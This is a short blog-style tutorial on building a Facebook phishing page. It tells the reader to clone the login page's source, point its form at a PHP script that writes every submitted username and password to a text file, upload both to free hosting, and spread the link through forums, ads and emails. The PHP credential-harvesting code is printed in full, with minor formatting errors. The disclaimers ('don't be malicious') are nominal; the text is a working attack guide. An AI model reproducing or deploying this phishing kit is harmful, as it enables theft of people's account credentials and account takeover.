Facebook phishing: Complete Guide


Hello everyone welcome to knowledgesuttra. today we are discussing about Facebook phishing. Steps required for making a facebook phishing page. Before proceeding it is respectively mentioned that don’t be malicious.

Create Facebook phishing page

Open facebook.com in your browser.
Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
Go ahead and Copy all of the page’s source code into Notepad (or your operating system’s best simple text editor).
If using Notepad, hit ctrl F (which is the find hotkey) and search for action.
You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1
Delete everything contained in the quotations, and instead fill the quotes with post.php.
Now it should read action=”post.php”Save this file somewhere on your computer with the file name of index.htm.
Omit the final period from the filename. This is going to become your phishing page.
Next, create a new notepad document with the name of post.php.
Omit the final period from the filename.

Copy and paste the following code into this document, and remember to save it:

header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
fwrite($handle, “rn”);

At this point, you should now have two files saved: index.htm and post.php.Next, this code actually needs to be uploaded to a web hosting service.
There are free hosting providers.
We’ll be using 000Webhost.After you have signed up for an account, browse to the control panel, and then to file manager.
Once the window opens, go to public_html.
Delete default.php, and then upload index.htm and post.php.
Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
Now go back to the file manage-rand public_html. There should be a file labeled username.txt.Open this file and you should be able to see login credentials that have been entered by a test user.

Don’t be malicious. Be conscious. And hereby we are not responsible for any kind of hacking attempt. Do this at your own risk.

Leave a Reply